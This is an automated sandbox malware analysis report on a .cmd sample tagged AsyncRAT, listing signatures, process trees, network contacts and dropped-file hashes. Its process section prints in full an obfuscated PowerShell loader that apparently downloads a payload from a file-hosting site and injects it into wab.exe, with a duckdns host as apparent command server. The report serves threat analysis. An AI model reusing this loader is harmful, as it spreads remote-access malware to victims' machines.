Malware Analysis Report

2024-10-23 19:25

Sample ID 240524-pwf3aacf5t
Target b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd
SHA256 b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953
Tags
asyncrat venom clients execution rat
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953

Threat Level: Known bad

The file b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd was found to be: Known bad.

Malicious Activity Summary

asyncrat venom clients execution rat

AsyncRat

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-24 12:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 12:40

Reported

2024-05-24 12:43

Platform

win7-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

Signatures

AsyncRat

rat asyncrat

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2536 set thread context of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1244 wrote to memory of 2188 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 2188 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 2188 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2284 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2284 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2284 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2536 wrote to memory of 2556 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2556 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2556 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2556 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2536 wrote to memory of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2536 wrote to memory of 2388 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. 
YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF 
HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. 
BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. 
YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF 
HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. 
BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | www.sendspace.com | udp
US | 172.67.170.105:443 | www.sendspace.com | tcp
US | 8.8.8.8:53 | fs12n4.sendspace.com | udp
CA | 69.31.136.53:443 | fs12n4.sendspace.com | tcp
US | 8.8.8.8:53 | crt.sectigo.com | udp
US | 104.18.38.233:80 | crt.sectigo.com | tcp
US | 172.67.170.105:443 | www.sendspace.com | tcp
US | 8.8.8.8:53 | fs13n5.sendspace.com | udp
CA | 69.31.136.57:443 | fs13n5.sendspace.com | tcp
US | 8.8.8.8:53 | xvern429.duckdns.org | udp
US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp

Files

memory/2188-4-0x000007FEF639E000-0x000007FEF639F000-memory.dmp

memory/2188-5-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2188-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

memory/2188-7-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-8-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-9-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-11-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2188-10-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3342.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar3365.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\INKNAZJHNIWR0GXKUZ1Y.temp

MD5 08a0caad60269269f79f8c9a9f1989fa
SHA1 0f2f108f6812fa3f328167becca140efd9717e90
SHA256 2190e67af1a2703e09c423d39284918917bcb4bdc86dc40748124eb01edba932
SHA512 daec82f33675662764c56b4df6fca97c66206335da55413e616062a5f1dc7b5a31c6fcd5ec23526306f622feabecbcb23d68edf582c254a130dffb40e4314938

C:\Users\Admin\AppData\Roaming\Anemotaxis.Saf

MD5 18fc7a00c5b4cd7bf88445aaf24491bf
SHA1 8127f6999587c6b0bfde91fceac9d0106907b9d2
SHA256 38393e1abae0ed937471b6d4196ebbf100921142ea85d266b3505cc24a992fc2
SHA512 0127009c795974510ea898f320450e7bd0b76dd395374c4058adab95e39e27459306cde56de5b39cd38f053513b26eda0d76da34af8cb9ca352daa5d5323ebfb

memory/2188-55-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2536-56-0x00000000065E0000-0x0000000009EF0000-memory.dmp

memory/2188-57-0x000007FEF639E000-0x000007FEF639F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 eb0ef510f2cda52ca27f1c9b257efd9e
SHA1 f140f9c1fbeeef1c30b99d20d4d8f1ded0723b37
SHA256 9022da409c864f2048389197b5745a5dc07c6546a973fbec5260cb3f11033354
SHA512 97143cb9d7cc56b46694ed712a6813ef75ff87ecd8ddc92b81e8e548f505e9a3e0d0a82b7de7525eb0e9d9ca48c8f268db099504918d63bd6c26e8d0fff84c2b

memory/2388-75-0x0000000000CD0000-0x0000000001D32000-memory.dmp

memory/2388-87-0x0000000000CD0000-0x0000000001D32000-memory.dmp

memory/2188-88-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

memory/2388-89-0x0000000000CD0000-0x0000000000CE6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 12:40

Reported

2024-05-24 12:43

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b84eb711989fbe9e0ff3ec874b5a0dac33655d27929fdce619ea94a35dca8953.cmd"

Signatures

AsyncRat

rat asyncrat

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1844 set thread context of 4896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
